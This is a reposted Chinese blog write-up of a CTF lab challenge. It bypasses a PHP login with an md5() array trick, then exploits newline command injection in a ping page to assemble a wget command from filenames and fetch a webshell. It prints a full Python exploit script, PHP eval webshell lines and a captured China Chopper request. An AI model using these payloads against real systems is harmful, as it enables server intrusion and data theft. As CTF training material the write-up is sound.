利用文件名进行GetShell---CTF题目的相关知识解析

最新推荐文章于 2024-07-19 15:11:33 发布
最新推荐文章于 2024-07-19 15:11:33 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: ctf 文章标签: 利用文件名进行GetShell ctf GetShell GetShell

转载自:https://blog.csdn.net/rigous/article/details/78570201

0x00 环境

今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一在/va/www目录下主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。

随后找了一个看似比较简单的题目尝试一下,解题之前我比较好奇是如何映射的端口,过程不表。

8081-8084是通过apache服务器进行的映射。配置文件位于/etc/apache2/ports.conf,关键点在下图中的四个listen

apache监听后设置虚拟机的虚拟端口,配置文件可以从ports.conf文件中获取。

 

<VirtualHost *:8081>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8081
        <Directory "/var/www/8081">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
<VirtualHost *:8082>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8082
        <Directory "/var/www/8082">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>


<VirtualHost *:8083>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8083
        <Directory "/var/www/8083">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>


<VirtualHost *:8084>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/8084
        <Directory "/var/www/8084">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>

 

设置之后便可以对端口应用进行访问了。

 

0x01 登录绕过

 

回到CTF题目,直接访问界面如下:

经过测试,应用只包含一个登陆界面。一顿测试后未果。经过百度查找,发现原题是一个代码审计的题目,尴尬了,于是去后台查看代码

参考网站如下: http://www.moonsos.com/post/256.html 关键代码如下:

 

 

  1. <?php

  2. session_start();

  3. error_reporting(0);

  4.  
  5.  

  6. include("config.php");

  7.  
  8.  

  9. header("Content-Type:text/html;charset=utf-8");

  10.  
  11.  

  12. function d_addslashes($array){

  13. foreach($array as $key=>$value){

  14. if(!is_array($value)){

  15. !get_magic_quotes_gpc()&&$value=addslashes($value);

  16. $array[$key]=$value;

  17. }else{

  18. $array[$key]=d_addslashes($array[$key]);

  19. }

  20. }

  21. return $array;

  22. }

  23.  
  24.  

  25. $_POST = d_addslashes($_POST);

  26. $_GET = d_addslashes($_GET);

  27. $username =isset($_POST['username'])?$_POST['username']:die();

  28. $password = isset($_POST['password'])?md5($_POST['password']):die();

  29. $sql="select password from users where username='$username'";

  30. $result = $conn->query($sql);

  31. $row = $result->fetch_assoc();

  32. if($row[0] === $password){

  33. $_SESSION['username']=$username;

  34. $_SESSION['status']=1;

  35. header("Location: index.php");

  36.  
  37.  

  38. }else{

  39.  
  40.  

  41. die("<script>alert('用户名或密码错误!!')</script>");

  42. }

  43. ?>

 


d_addslashes 函数相当于全局过滤,不存在注入漏洞、且数据库与web都是UTF-8编码,也不存在宽字节注入。根据提示,在$row[0] === $password处存在逻辑漏洞。

 

输入username为不存在用户时,$result为null,从而row[0]为null。password经过md5()函数处理,当参数不为string时会返回null,因此。设置参数“password=1”为“password[]=1”使MD5参数由本来的字符串变为数组即可。便可以绕过验证。

 

0x02 命令执行

验证通过后会跳转到一个展示页面,通过查看源代码,会发现存在ping.php在注释行当中,访问后,来到页面:

既然可以执行ping,那么很可能会存在命令注入。

页面对ip格式进行了正则匹配,最小长度输入为1.1.1.1。后面加入分隔符;& |等,无法正常执行命令,经过测试会发现,程序对& ; | ) ( ` $进行了过滤。但是没有对%0a进行过滤。尝试进行命令注入如下1.1.1.1%0awhoami

尝试写入最短的shell <?=`$_GET(1)`; 但是写入失败,1.1.1.1%0aecho+"shell <?=`$_GET(1)`; ">1.php提示长度错误。分开写的话还是无法成功。鼓捣了半天发现运行权限和文件权限不一样,(可以通过ls -la 和whoami判定)apache是www-data用户,文件夹属于ctf权限。后来发现upload文件夹是775,正好两个账户同属于ctf用户组。于是最小的命令为1.1.1.1%0aecho+"1">upload/1.php,显然还是超了。

后来查询资料,可以借鉴http://wonderkun.cc/index.html/?p=524的七个字符长度任意命令注入。总体思路是通过>xx创建空文件,把wget命令分段写入文件名中,再通过ls到bash脚本中执行wget从而getshell

当前题目与其不同的地方是当前目录无法写入,长度限制在8-25之间,需要写入js等子目录。于是通过修改上述代码,进行自动化写入:

 

 

  1. # -*- coding UTF-8 -*-

  2. import requests

  3.  

  4. def getshell():

  5. uri = "http://192.168.1.101:8084/ping.php"

  6. header = {

  7. "Cookie": "PHPSESSID=6o7trs1airh18ea8s3u5npj626",

  8. "Content-Type": "application/x-www-form-urlencoded"

  9. }

  10.  

  11. download = ["1.php", "8083\ -O\ \\", "7.0.0.1:\\", "wget\ 12\\"]

  12. proxy = {"http": "127.0.0.1:8080"}

  13. for req in download:

  14. base = "ip=1.1.1.1%0a>js\/"

  15. data = base + req

  16. requests.post(url=uri, data=data, headers=header, proxies=proxy)

  17.  

  18. sh = "ip=1.1.1.1%0als%20js%20-t>js\/1"

  19. requests.post(url=uri, data=sh, headers=header, proxies=proxy)

  20.  

  21. download = "ip=1.1.1.1%0ash%20js\/1"

  22. requests.post(url=uri, data=download, headers=header, proxies=proxy)

  23. response = requests.get("http://192.168.1.108:8084/1.php")

  24. if response.status_code == 200:

  25. print("[*] getshell!!")

  26. else:

  27. print("[*] failed!")

  28.  

  29. if __name__ == "__main__":

  30. getshell()

运行脚本会得到一个1.php的webshell,使用菜刀进行连接。通过config.php获取数据库连接口令和账户,得到flag。

0x03 补充

中间遇到了很多问题,也get了一些知识点:

 

1、Linux文件名称中不能包含/,所以在远程服务器下载木马时无法使用wget xxxx/dir的形式,只能在访问index的时候自动下载目录。当前我能想到比较笨的方法是在index页面中写入如下代码:

 

 

  1. <?php

  2.  

  3. echo("<?php @eval(\$_POST['as']);

  4. ?>

 

其中$需要进行转义,否则无法正常打印


2、命令分隔如下:

 

wget 12\

7.0.0.1:\

8083 -O\

1.php

其中遇到一个大坑,参数应该是大写字母O,即下载内容另存为此文件名。小写的o代表过程信息记录到1.php中。

 

另外在解题过程中抓取了菜刀的报文,做个记录

 

 

  1. @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."

  2. ";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();&z1=/var/www/8084/assets/i/

xuchen16
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022全国职业技能大赛“信息安全管理与评估“--应急响应日志分析解析(高职组)
Aluxian_的博客
02-16 4757
竞赛有固定的开始和结束时间,参赛队伍必须决定如何有效的分配时间。请认真阅读以下指引!(1)当竞赛结束,离开时请不要关机;(2)所有配置应当在重启后有效;(3)除了CD-ROM/HDD/NET驱动器,请不要修改实体机的配置和虚拟机本身的硬件设置。所需的设备、机械、装置和材料所有测试项目都可以由参赛选手根据基础设施列表中指定的设备和软件完成。评分方案本项目模块分数为350分。
CTF技能梳理系列 ---- 文件上传
Joker_York的博客
09-02 1478
主要以CTFHub技能树里的文件上传题目为例 无验证 直接上传webshell。 <?php @eval($_GET[cmd]); ?> payload: http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证 查看页面源码,可以看到前端的JS验证代码: <script> function checkfilesuffix() { var file=document.
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 933
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
「漏洞复现」FOG Project 文件名命令注入漏洞复现(CVE-2024-39914)
最新发布
qq_39894062的博客
07-19 528
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
bugku ctf 求getshell
qq_42777804的博客
08-02 509
打开之后 是 文件上传 但是不可以上传 php文件 说明存在过滤 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如mulTipart/form-data (其中t为大写) 所上传的文...
一道二次注入GetshellCTF
Lethe's Blog
03-03 4199
这道题是CUMT第二次双月赛的一道web题,在上一篇wp:CUMT第二次双月赛——Web详解中已经详细分析过了,由于我刚入门,觉得在这道题中收获了很多知识,所以想单独放在一篇文章中,方便之后分类查阅。 关于什么是二次注入,可参考:SQL二次注入 下面进入题目: 文件管理系统 1、先扫目录,发现可以下载源码,进行代码审计。 2、查看upload.php代码,发现是如下白名单验证,无法上传绕过。 ...
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1557
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
BugkuCTF(old)----流量分析题目Writeup
Au
09-26 1829
flag被盗 文件不是很大,粗略看了一下,发现了shell.php字段 筛选为http流量,追踪TCP查看 直接得到flagflag{This_is_a_f10g} 中国菜刀 下载解压得到数据包,比较小只有7kb 只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包 使用kali集成的 binwa...
CTF-2021中国能源网络WEB题目全解
wulanlin的博客
12-31 1027
0x01 前言 在2021年10月15日的“中国能源网络安全大赛”,笔者对WEB题目进行了尝试,幸运的做出了所有题目。 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以笔者将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 下面笔者将分享这次比赛的解题过程。 0x02 ezphp 这是一道很简单的题目,同时也被大家刷成了签到题。
CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权
su__xiaoyan的博客
01-07 1390
实验环境 攻击者:Kali Linux(192.168.0.19) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.18) 实验流程 通过目录遍历漏洞getshell流程参考链接:https://blog.csdn.net/su__xiaoyan/article/details/111830830 ...
CTF之Bukg 求getshell
weixin_41607190的博客
11-03 289
随便上传一个jpg文件,抓包修改请求的信息 要改的地方有三处 一个是Content-Type中的值大小写改一下,这里不是很明白,留个坑 第二个改后缀名,php5没有过滤 然后就是文件类型 image/jpeg ...
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4469
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1897
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 174
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
记一次面试题getshell
Ms08067安全实验室
07-08 582
【重要提示】因为公众号改了推送规则,一些读者反映有时收不到文章更新,不想错过的老铁可以这样:1、星标:点击公众号头像右上角的小人-然后点击点击右上角的“…”-设为星标。2、分享、赞、在看...
[SUCTF 2018]GetShell
qq_43801002的博客
07-27 1360
题目 过程 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 发现可以上传php文件,访问过后发现,直
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1866
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
Bugku:web 求getshell
qq_26961571的博客
09-09 1036
打开这道题,getshell表示的是get shellshell则为脚本的意思。 ​ 打开链接。 发现是一个网页可以上传文件,那么就是文件上传漏洞。 源代码也是不出所料的没有任何东西。 看来是真的要上传一个文件了,试了一下上传一个jpg格式文件,成功!!不过没有用啊,什么东西都没有显示出来。 查了一下资料: webshell就是以php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值